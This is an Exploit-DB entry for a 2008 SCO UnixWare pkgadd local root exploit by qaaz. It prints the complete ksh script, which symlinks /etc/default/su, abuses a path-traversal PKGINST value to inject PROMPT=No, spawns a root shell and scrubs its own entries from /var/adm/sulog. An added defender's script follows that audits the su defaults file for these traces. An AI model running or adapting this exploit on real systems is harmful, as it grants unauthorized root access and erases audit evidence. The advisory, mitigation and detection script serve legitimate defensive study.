vendor: UnixWare
by: qaaz
CVSS: 7.2 HIGH
Local Privilege Escalation
CWE: 264
Product Name: UnixWare
Affected Version From: SCO UnixWare < 7.1.4 p534589
Affected Version To: N/A
Patch Exists: YES
Platforms Tested: UnixWare
2008

UnixWare pkgadd Local Root Exploit

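This exploit targets SCO UnixWare < 7.1.4 p534589. It creates a symbolic link, woot.log, pointing to /etc/default/su, then runs pkgadd with a PKGINST value that traverses back to that link, so that the PROMPT=No line passed as the package name is written through the link into /etc/default/su. The modified file is then used with su to gain root privileges.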

Mitigation:

Upgrade to the latest version of SCO UnixWare

Exploit-DB raw data:

#!/bin/ksh
#
# 04/2008: public release
# SCO UnixWare < 7.1.4 p534589
#
if [ `id -un` = 'root' ]; then
	grep -v " $1-root\$" /var/adm/sulog >su.log
	cp su.def /etc/default/su
	cp su.log /var/adm/sulog
	rm -f su.def su.log woot.log
else
	echo "------------------------------------"
	echo " UnixWare pkgadd Local Root Exploit"
	echo " By qaaz"
	echo "------------------------------------"
	EVIL=`echo 'XX\nPROMPT=No\nXX'`
	cp /etc/default/su su.def
	ln -s /etc/default/su woot.log
	PKGINST=../../../..`pwd`/woot /usr/sbin/pkgadd "$EVIL" 1>/dev/null 2>&1
	su root -c "$0 `id -un`; /bin/sh -i"
fi

# milw0rm.com [2008-04-04]
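
For defenders, an added example (not part of the original exploit or the Exploit-DB entry) that audits a su defaults file for the traces the script above would leave in it. The function names, the sample file contents and the assumption that PROMPT=No and lines that are not NAME=value entries are unexpected in /etc/default/su on your system are mine, not the page's.

```shell
#!/bin/sh
# Added example, not part of the original script.
# audit_su_defaults FILE: report entries in a su defaults file that match
# what the script above passes to pkgadd.
# Returns 0 = nothing flagged, 1 = entries flagged, 2 = file unreadable.
audit_su_defaults() {
    f=$1 rc=0 n=0
    [ -r "$f" ] || { echo "UNREADABLE: $f"; return 2; }
    while IFS= read -r line || [ -n "$line" ]; do
        n=$((n + 1))
        case $line in ''|'#'*) continue ;; esac   # skip blanks and comments
        case $line in
            *=*) name=${line%%=*} value=${line#*=} ;;
            *)   name= value= ;;
        esac
        case $name in
            ''|*[!A-Za-z0-9_]*)                   # not a NAME=value entry
                echo "MALFORMED line $n: $line"; rc=1 ;;
            PROMPT)                               # assumption: No is unexpected
                case $value in
                    [Nn][Oo]) echo "PROMPT_OFF line $n: $line"; rc=1 ;;
                esac ;;
        esac
    done < "$f"
    return "$rc"
}

# Constructed sample: a defaults file holding the three lines the script
# passes as the package name. What pkgadd writes around them is not on the page.
write_sample() {
    printf '%s\n' '# constructed sample' 'SULOG=/var/adm/sulog' \
        'XX' 'PROMPT=No' 'XX' > "$1"
}

if [ $# -gt 0 ]; then
    audit_su_defaults "$1"                        # e.g. /etc/default/su
else
    demo=${TMPDIR:-/tmp}/su.def.demo.$$
    write_sample "$demo"
    audit_su_defaults "$demo" || echo "status: $?"
    rm -f "$demo"
fi
```

The script above restores /etc/default/su from its su.def copy once it runs as root, so a check like this only sees the change while it is in place; comparing the file against a known-good copy on a schedule covers the same ground.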